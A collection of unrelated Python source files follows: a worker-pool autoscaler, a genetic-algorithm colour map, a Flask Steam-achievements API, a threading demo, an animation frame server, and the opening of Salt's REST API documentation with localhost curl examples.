return all([w.busy for w in self.workers])
@property
def full(self):
return len(self.workers) == self.max_workers
@property
def debug_meta(self):
return 'min={} max={}'.format(self.min_workers, self.max_workers)
def cleanup(self):
"""
Perform some internal account and cleanup. This is run on
every cluster node heartbeat:
1. Discover worker processes that exited, and recover messages they
were handling.
2. Clean up unnecessary, idle workers.
3. Check to see if the database says this node is running any tasks
that aren't actually running. If so, reap them.
IMPORTANT: this function is one of the few places in the dispatcher
(aside from setting lookups) where we talk to the database. As such,
if there's an outage, this method _can_ throw various
django.db.utils.Error exceptions. Act accordingly.
"""
orphaned = []
for w in self.workers[::]:
if not w.alive:
# the worker process has exited
# 1. take the task it was running and enqueue the error
# callbacks
# 2. take any pending tasks delivered to its queue and
# send them to another worker
logger.error('worker pid:{} is gone (exit={})'.format(w.pid, w.exitcode))
if w.current_task:
if w.current_task != 'QUIT':
try:
for j in UnifiedJob.objects.filter(celery_task_id=w.current_task['uuid']):
reaper.reap_job(j, 'failed')
except Exception:
logger.exception('failed to reap job UUID {}'.format(w.current_task['uuid']))
orphaned.extend(w.orphaned_tasks)
self.workers.remove(w)
elif w.idle and len(self.workers) > self.min_workers:
# the process has an empty queue (it's idle) and we have
# more processes in the pool than we need (> min)
# send this process a message so it will exit gracefully
# at the next opportunity
logger.warn('scaling down worker pid:{}'.format(w.pid))
w.quit()
self.workers.remove(w)
for m in orphaned:
# if all the workers are dead, spawn at least one
if not len(self.workers):
self.up()
idx = random.choice(range(len(self.workers)))
self.write(idx, m)
# if the database says a job is running on this node, but it's *not*,
# then reap it
running_uuids = []
for worker in self.workers:
worker.calculate_managed_tasks()
running_uuids.extend(list(worker.managed_tasks.keys()))
reaper.reap(excluded_uuids=running_uuids)
def up(self):
if self.full:
# if we can't spawn more workers, just toss this message into a
# random worker's backlog
idx = random.choice(range(len(self.workers)))
return idx, self.workers[idx]
else:
return super(AutoscalePool, self).up()
def write(self, preferred_queue, body):
try:
# when the cluster heartbeat occurs, clean up internally
if isinstance(body, dict) and 'cluster_node_heartbeat' in body['task']:
self.cleanup()
if self.should_grow:
self.up()
# we don't care about "preferred queue" round robin distribution, just
# find the first non-busy worker and claim it
workers = self.workers[:]
random.shuffle(workers)
for w in workers:
if not w.busy:
w.put(body)
break
else:
return super(AutoscalePool, self).write(preferred_queue, body)
except Exception:
for conn in connections.all():
# If the database connection has a hiccup, re-establish a new
# connection
conn.close_if_unusable_or_obsolete()
logger.exception('failed to write inbound message')
|
Color_map.py
|
from Genetica import Genetica
import numpy as np
import random
import matplotlib.pyplot as plt
import threading
import math
class Color_map(Genetica):
def __init__(self,prob_cruza=0.8,prob_mut=0.5,porcentaje_elite=0.1,poblacion=50,generaciones=100, fitness_min = 0.9,tam_x=8,tam_y=8):
Genetica.__init__(self,prob_cruza,prob_mut,porcentaje_elite,poblacion,generaciones,fitness_min)
self.tam_x = tam_x
self.tam_y = tam_y
self.rand_colors_dict = [(0,0,255),(255,255,0),(0,255,0),(255,0,0)]
self.disp_color = [17,18,13,16]
@staticmethod
def gen_random_color():
return (random.randint(0,255),random.randint(0,255),random.randint(0,255))
def gen_random_individuo(self):
disp_color = []
for disp in self.disp_color:
disp_color.append(disp)
ind = np.zeros((self.tam_x*self.tam_y))
for i in range(self.tam_x*self.tam_y):
color_rand = random.randint(0,len(self.rand_colors_dict)-1)
while disp_color[color_rand] == 0:
color_rand = random.randint(0,len(self.rand_colors_dict)-1)
disp_color[color_rand] = disp_color[color_rand] - 1
ind[i] = color_rand
return ind.reshape(self.tam_x,self.tam_y)
return np.random.randint(low=0,high=len(self.rand_colors_dict),size=(self.tam_x,self.tam_y)).astype(int)
def add_random_individuo(self):
ind = self.gen_random_individuo()
self.poblacion_actual.append({"individuo":ind,"fitness":self.fitness(ind)})
def gen_poblacion_inicial(self):
for i in range(self.poblacion):
threading.Thread(target=self.add_random_individuo).start()
while len(self.poblacion_actual) < self.poblacion:
pass
def contar_colores(self,individuo):
color = np.zeros((len(self.rand_colors_dict)))
for col in individuo.reshape(self.tam_x*self.tam_y):
color[int(col)] = color[int(col)] + 1
return color
def mostrar_individuo(self,individuo):
ind = []
for x in range(self.tam_x):
ind.append([])
for y in range(self.tam_y):
ind[x].append(self.rand_colors_dict[int(individuo[x][y])])
plt.imshow(ind)
print(self.contar_colores(individuo))
file = "resultados.csv"
with open(file,"a") as f:
f.write("\n"+str(self.prob_cruza)+","+str(self.prob_mut)+","+str(self.porcentaje_elite)+","+str(self.poblacion)+","+str(self.generaciones)+","+str(self.fitness_min)+","+str(float(self.poblacion_elite[0]["fitness"])*100)+"%")
plt.show()
def evaluar(self):
if self.poblacion_elite[0]["fitness"] >= self.fitness_min:
return True
return False
@staticmethod
def fit_opt(individuo,tam_x,tam_y):
aptitud = 0
cont_aptitud = 0
for y in range(tam_y):
for x in range(tam_x):
norte = (x,y - 1)
oeste = (x - 1,y)
sur = (x,y + 1)
este = (x + 1,y)
noroeste = (x - 1, y - 1)
suroeste = (x - 1, y + 1)
noreste = (x + 1, y - 1)
sureste = (x + 1, y + 1)
vecinos = [norte,sur,este,oeste,noreste,noroeste,sureste,suroeste]
for vecino in vecinos:
xv,yv = vecino
if xv >=0 and yv >=0 and xv <= tam_x - 1 and yv <= tam_y - 1:
if(individuo[x][y] == individuo[xv][yv]):
aptitud = aptitud + 1
cont_aptitud = cont_aptitud + 1
return aptitud/cont_aptitud
@staticmethod
def fit_opt_2(individuo,tam_x,tam_y):
aptitud = 0
cont_aptitud = 0
for y in range(tam_y):
for x in range(tam_x):
val_act = individuo[x][y]
for y2 in range(tam_y):
for x2 in range(tam_x):
if x != x2 or y != y2:
if val_act == individuo[x2][y2]:
aptitud = aptitud + math.sqrt((x2-x)**2+(y2-y)**2)
cont_aptitud = cont_aptitud + 1
return (aptitud/cont_aptitud)/10
def fitness(self,individuo):
##return self.fit_opt_2(individuo,self.tam_x,self.tam_y)
return self.fit_opt(individuo,self.tam_x,self.tam_y)
def cruzar(self,individuo1,individuo2):
temp = individuo1["individuo"]
for x in range(self.tam_y):
for y in range(self.tam_x):
if not self.is_elite(individuo1):
if random.random() <= self.prob_cruza:
individuo1["individuo"][x][y] = individuo2["individuo"][x][y]
if not self.is_elite(individuo2):
if random.random() <= self.prob_cruza:
individuo2["individuo"][x][y] = temp[x][y]
individuo1 = self.mutar(individuo1)
individuo2 = self.mutar(individuo2)
threading.Thread(target=self.calc_fitness,args=(individuo1["individuo"],)).start()
threading.Thread(target=self.calc_fitness,args=(individuo2["individuo"],)).start()
def gen_rand_pos(self):
x = random.randint(0,self.tam_x-1)
y = random.randint(0,self.tam_y-1)
return x,y
def calc_fitness(self,individuo):
self.poblacion_siguiente.append({"individuo":individuo,"fitness":self.fitness(individuo)})
def mutar(self,individuo):
ind = individuo
individuo = individuo["individuo"]
if not self.is_elite(ind):
for x in range(self.tam_y):
for y in range(self.tam_x):
if random.random() <= self.prob_mut:
rand_x = random.randint(0,self.tam_x-1)
rand_y = random.randint(0,self.tam_y-1)
temp = individuo[x][y]
individuo[x][y] = individuo[rand_x][rand_y]
individuo[rand_x][rand_y] = temp
ind["inidividuo"] = individuo
return ind
def elite(self):
pob = sorted(self.poblacion_actual, key = lambda i: i['fitness'],reverse=True)
num_pob_elite = int(self.poblacion * self.porcentaje_elite)
self.poblacion_elite = pob[:num_pob_elite]
def is_elite(self, individuo):
tam_elite = len(self.poblacion_elite) - 1
if individuo['fitness'] >= self.poblacion_elite[tam_elite]['fitness']:
return True
return False
def sust_not_elite(self,poblacion):
poblacion_nueva = []
for pob in poblacion:
if self.is_elite(pob):
poblacion_nueva.append(pob)
else:
ind = self.gen_random_individuo()
poblacion_nueva.append({"individuo":ind,"fitness":self.fitness(ind)})
return poblacion_nueva
def evolucionar(self):
self.gen_poblacion_inicial()
self.elite()
self.poblacion_siguiente = []
for generacion in range(self.generaciones):
if self.evaluar():
print("Candidato adecuado encontrado")
self.mostrar_individuo(self.poblacion_elite[0]["individuo"])
break
else:
print("generacion {} El mejor candidato hasta ahora es {}".format(generacion+1,self.poblacion_elite[0]["fitness"]))
candidatos = []
ind_num = 0
while len(self.poblacion_actual) > 0:
ind_num = ind_num + 1
candidatos.append(self.poblacion_actual.pop())
if len(candidatos) == 2:
threading.Thread(target=self.cruzar,args=(candidatos[0],candidatos[1],)).start()
candidatos = []
if len(candidatos) == 1:
self.poblacion_siguiente.append(candidatos.pop())
while(len(self.poblacion_siguiente)<self.poblacion):
pass
self.poblacion_actual = []
self.poblacion_actual = self.sust_not_elite(self.poblacion_siguiente)
self.poblacion_siguiente = []
self.elite()
self.mostrar_individuo(self.poblacion_elite[0]["individuo"])
|
main.py
|
#!/usr/bin/env python
from multiprocessing import Process
import os
from flask import Flask, jsonify, make_response
from neomodel import config as neoconfig
import yaml
import unlocked
import data
import imports
from common.model import Achievement, Game, Player, to_dict
# create a new Flask object
app = Flask(__name__)
@app.route("/achievements")
def get_achievements() -> str:
return jsonify([achievement.__dict__ for achievement in Achievement.nodes.all()])
@app.route("/achievements/unlocked")
def get_unlocked_achievements() -> str:
# hardcode for testing
steam_id = 76561197962272442
game_id = 440
list_of_achievements_per_game = data.get_achievements_steam_single(
steam_id, cfg["steam"]["key"], game_id)
# number of unlocked achievements
count_of_unlocked_achievements = unlocked.count_unlocked_achievements(
list_of_achievements_per_game)
# list all unlocked achievements
unlocked_achievements = unlocked.list_unlocked_achievements(
list_of_achievements_per_game)
return jsonify(unlocked_achievements)
@app.route("/")
def test() -> str:
return jsonify({1: "ein", 2: "schluessel", 3: "fuer", 4: "schloesser"})
@app.route("/games")
def get_games() -> str:
return jsonify([to_dict(game) for game in Game.nodes.all()])
@app.route("/games/<int:app_id>/achievements")
def get_achievement_for_game(app_id) -> str:
game: Game = Game.nodes.get_or_none(steam_app_id=app_id)
if game is not None:
return jsonify([to_dict(achievement) for achievement in game.achievements.all()])
else:
return make_response('Game not found', 404)
@app.route("/players")
def get_players() -> str:
return jsonify([player.to_dict() for player in Player.nodes.all()])
def do_imports(cfg):
neoconfig.DATABASE_URL = cfg["neo4j"]["uri"]
# some initialization of game data, achievements, ...
imports.steam(76561197966228499, cfg["steam"]["key"]) # biftheki
imports.steam(76561197962272442, cfg["steam"]["key"]) # oxisto
imports.steam(76561197960824521, cfg["steam"]["key"]) # ipec
imports.steam(76561197960616970, cfg["steam"]["key"]) # neo
print("Done with imports")
if __name__ == "__main__":
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
# our default configuration
default_cfg = {
"neo4j": {
"uri": "bolt://localhost:7687",
"username": "neo4j",
"password": "password"
},
"steam": {}
}
# load config file
ymlfile = open("config.yml", "r")
# merge default configuration with the one in the yaml file
cfg = {**default_cfg, **yaml.load(ymlfile)}
if "key" not in cfg["steam"]:
print("Please provide a steam key.")
exit(-1)
neoconfig.DATABASE_URL = cfg["neo4j"]["uri"]
# launch a seperate thread/process for imports
print("Spawing imports process")
p = Process(target=do_imports, args=(cfg,))
p.start()
# start the REST API
app.run(debug=True)
|
threadJoin.py
|
import threading
import time
def ourThread(i):
print("Thread {} Started".format(i))
time.sleep(i*2)
print("Thread {} Finished".format(i))
def main():
thread = threading.Thread(target=ourThread, args=(1,))
thread.start()
print("Is thread 1 Finished?")
thread2 = threading.Thread(target=ourThread, args=(2,))
thread2.start()
thread2.join()
print("Thread 2 definitely finished")
if __name__ == '__main__':
main()
|
frame_server_impl.py
|
from ...config import config
from ...scene import scene
from ..gen import frameserver_pb2
from ..gen import frameserver_pb2_grpc
from ..gen import renderserver_pb2
from ..gen import renderserver_pb2_grpc
from concurrent import futures
from google.protobuf import json_format
from watchdog.events import LoggingEventHandler, FileSystemEventHandler
from watchdog.observers import Observer
import grpc
import subprocess as sp
import threading
import time
import ctypes
from ...utils.module_ops import (
get_module,
get_scene_classes_from_module,
get_scenes_to_render,
)
from ... import logger
from ...constants import JS_RENDERER_INFO
class FrameServer(frameserver_pb2_grpc.FrameServerServicer):
def animation_index_is_cached(self, animation_index):
return animation_index < len(self.keyframes)
def __init__(self, server, scene_class):
self.server = server
self.keyframes = []
self.scene = scene_class(self)
self.scene_thread = threading.Thread(
target=lambda s: s.render(), args=(self.scene,)
)
self.previous_frame_animation_index = None
self.scene_finished = False
path = "./example_scenes/basic.py"
event_handler = UpdateFrontendHandler(self)
observer = Observer()
observer.schedule(event_handler, path)
observer.start()
# If a javascript renderer is running, notify it of the scene being served. If
# not, spawn one and it will request the scene when it starts.
with grpc.insecure_channel("localhost:50052") as channel:
stub = renderserver_pb2_grpc.RenderServerStub(channel)
request = renderserver_pb2.NewSceneRequest(name=str(self.scene))
try:
stub.NewScene(request)
except grpc._channel._InactiveRpcError:
logger.warning(f"No frontend was detected at localhost:50052.")
try:
sp.Popen(config["js_renderer_path"])
except PermissionError:
logger.info(JS_RENDERER_INFO)
self.server.stop(None)
return
self.scene_thread.start()
def signal_pending_animation(self, animation_index):
self.scene.start_animation = animation_index
self.scene.animation_finished.set()
return frameserver_pb2.FrameResponse(frame_pending=True)
def GetFrameAtTime(self, request, context):
selected_scene = None
if self.animation_index_is_cached(request.animation_index):
selected_scene = self.keyframes[request.animation_index]
else:
return self.signal_pending_animation(request.animation_index)
# play() uses run_time and wait() uses duration TODO: Fix this inconsistency.
# TODO: What about animations without a fixed duration?
duration = (
selected_scene.run_time
if selected_scene.animations
else selected_scene.duration
)
if request.animation_offset > duration:
if self.animation_index_is_cached(request.animation_index + 1):
# TODO: Clone scenes to allow reuse.
selected_scene = self.keyframes[request.animation_index + 1]
else:
return self.signal_pending_animation(request.animation_index + 1)
setattr(selected_scene, "camera", self.scene.camera)
if selected_scene.animations:
# This is a call to play().
selected_scene.update_animation_to_time(request.animation_offset)
selected_scene.update_frame(
selected_scene.moving_mobjects,
selected_scene.static_image,
)
serialized_mobject_list, duration = selected_scene.add_frame(
selected_scene.renderer.get_frame()
)
resp = list_to_frame_response(
selected_scene, duration, serialized_mobject_list
)
return resp
else:
# This is a call to wait().
if selected_scene.should_update_mobjects():
# TODO, be smart about setting a static image
# the same way Scene.play does
selected_scene.update_animation_to_time(time)
selected_scene.update_frame()
serialized_mobject_list, duration = selected_scene.add_frame(
selected_scene.get_frame()
)
frame_response = list_to_frame_response(
selected_scene, duration, serialized_mobject_list
)
if (
selected_scene.stop_condition is not None
and selected_scene.stop_condition()
):
selected_scene.animation_finished.set()
frame_response.frame_pending = True
selected_scene.renderer_waiting = True
return frame_response
elif selected_scene.skip_animations:
# Do nothing
return
else:
selected_scene.update_frame()
dt = 1 / selected_scene.camera.frame_rate
serialized_mobject_list, duration = selected_scene.add_frame(
selected_scene.get_frame(),
num_frames=int(selected_scene.duration / dt),
)
resp = list_to_frame_response(
selected_scene, duration, serialized_mobject_list
)
return resp
def RendererStatus(self, request, context):
response = frameserver_pb2.RendererStatusResponse()
response.scene_name = str(self.scene)
return response
# def UpdateSceneLocation(self, request, context):
# # Reload self.scene.
# print(scene_classes_to_render)
# response = frameserver_pb2.SceneLocationResponse()
# return response
def list_to_frame_response(scene, duration, serialized_mobject_list):
response = frameserver_pb2.FrameResponse()
response.frame_pending = False
response.duration = duration
for mob_serialization in serialized_mobject_list:
mob_proto = response.mobjects.add()
mob_proto.id = mob_serialization["id"]
mob_proto.needs_redraw = mob_serialization["needs_redraw"]
for point in mob_serialization["points"]:
point_proto = mob_proto.points.add()
point_proto.x = point[0]
point_proto.y = point[1]
point_proto.z = point[2]
mob_proto.style.fill_color = mob_serialization["style"]["fill_color"]
mob_proto.style.fill_opacity = float(mob_serialization["style"]["fill_opacity"])
mob_proto.style.stroke_color = mob_serialization["style"]["stroke_color"]
mob_proto.style.stroke_opacity = float(
mob_serialization["style"]["stroke_opacity"]
)
mob_proto.style.stroke_width = float(mob_serialization["style"]["stroke_width"])
return response
class UpdateFrontendHandler(FileSystemEventHandler):
"""Logs all the events captured."""
def __init__(self, frame_server):
super().__init__()
self.frame_server = frame_server
def on_moved(self, event):
super().on_moved(event)
raise NotImplementedError("Update not implemented for moved files.")
def on_deleted(self, event):
super().on_deleted(event)
raise NotImplementedError("Update not implemented for deleted files.")
def on_modified(self, event):
super().on_modified(event)
module = get_module(config["input_file"])
all_scene_classes = get_scene_classes_from_module(module)
scene_classes_to_render = get_scenes_to_render(all_scene_classes)
scene_class = scene_classes_to_render[0]
# Get the old thread's ID.
old_thread_id = None
old_thread = self.frame_server.scene_thread
if hasattr(old_thread, "_thread_id"):
old_thread_id = old_thread._thread_id
if old_thread_id is None:
for thread_id, thread in threading._active.items():
if thread is old_thread:
old_thread_id = thread_id
# Stop the old thread.
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(
old_thread_id, ctypes.py_object(SystemExit)
)
if res > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(old_thread_id, 0)
print("Exception raise failure")
old_thread.join()
# Start a new thread.
self.frame_server.initialize_scene(scene_class, start_animation=1)
self.frame_server.scene.reached_start_animation.wait()
# Serialize data on Animations up to the target one.
animations = []
for scene in self.frame_server.keyframes:
if scene.animations:
animation_duration = scene.run_time
if len(scene.animations) == 1:
animation_name = str(scene.animations[0])
else:
animation_name = f"{str(scene.animations[0])}..."
else:
animation_duration = scene.duration
animation_name = "Wait"
animations.append(
renderserver_pb2.Animation(
name=animation_name,
duration=animation_duration,
)
)
# Reset the renderer.
with grpc.insecure_channel("localhost:50052") as channel:
stub = renderserver_pb2_grpc.RenderServerStub(channel)
request = renderserver_pb2.ManimStatusRequest(
scene_name=str(self.frame_server.scene), animations=animations
)
try:
stub.ManimStatus(request)
except grpc._channel._InactiveRpcError:
sp.Popen(config["js_renderer_path"])
def get(scene_class):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
frameserver_pb2_grpc.add_FrameServerServicer_to_server(
FrameServer(server, scene_class), server
)
server.add_insecure_port("localhost:50051")
return server
|
app.py
|
"""
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
